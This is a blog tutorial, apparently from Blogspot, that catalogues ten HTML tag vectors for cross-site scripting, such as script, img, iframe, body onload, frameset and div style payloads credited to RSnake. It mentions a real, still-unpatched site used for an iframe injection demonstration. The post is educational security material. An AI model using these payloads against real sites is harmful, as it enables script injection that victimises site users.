XSS:ANATOMY PART 2

Hello friends, this time i am going to tell you different kind of tags that can be used for xss injection, i will be taking a practical example of a site, as the vulernability about that site has been informed but still that site has not been fixed.

Initially i will try to collect all the tags which can be used for xss, i will also like to mention that this is not my own finding originally published by RSNAKE, i am trying to collect all the information regarding xss at once place, so i thought without the basic tags, it wont be possible to get the general idea of xss working.

Tags:

1.Script tag

We all know for the basic finding of the xss bug, we type {script}
alert(1){/script}. It is used to check wether any javascript is passing or not.

2.Image tag

It is used to check the filter for bypassing using image tag. eg.{img src="javascript:alert(1);" /}

Those who know the basic of HTML can understand this, I wont be explaining its working. In this javascript try to bypass the filter by using img tag.

3.iframe

In this iframe injection is used to incorporate the evil website into the victim's website

eg.
{iframe src="http://www.google.com"}{ /iframe}

4.Title Tag
Title tag can also be used to include the malicious XSS code
{/TITLE}{SCRIPT}alert("XSS");{/SCRIPT}

5.Input tag.
{INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"}

6.Body Tag
{BODY BACKGROUND="javascript:alert('XSS')"}
One notabel feature of body tag is that it doesnot require the usage of javascript for the esxecution of xss. example:
{BODY ONLOAD=alert('XSS')}

7.Style Sheet
Remote style sheet can be also used for the execution or inclution of malicious XSS code
{LINK REL="stylesheet" HREF="http://www.google.com"}

8.Frames
Frames can be also used as they have the same kind of problem as of iframe
{FRAMESET}{FRAME SRC="javascript:alert('XSS');"}{/FRAMESET}

9.Tables
You guys can be surprised to know that even tables can be used for the xss this discovery was made by RSNAKE(as far as i know)
{TABLE BACKGROUND="javascript:alert('XSS')"}

10.Div
Now comes the favourite of all DIV style.eg.
{DIV STYLE="background-image: url(javascript:alert('XSS'))"}

In the above examples replace {  } by <  > respectively as in this blogspot all the tags were taken as html code so pages behaviour was changing according to it, due to of which i wasnt able to give the exact syntax.

In the above figure i have tried to give you the practical demonstration for the iframe injection, as it is not possible here to give the practical example of each and every tag discussed.  I havenot discussed the working or the demerits of the tags, which leds to the execution of arbitarary XSS code, proabably i will do that in future.

Anyways, this website is up till today and original finder of the xss bug has reported its bug also. If you guys wants to practice more you can visit xssed.com which is database for the xss vul.

I will discuss more tags in future, as RSNAKE has given large number of tags, all credit goes to him.

Note:

1.Author is not resposible for the illegal use of the material provided here, it is only meant for the education purpose.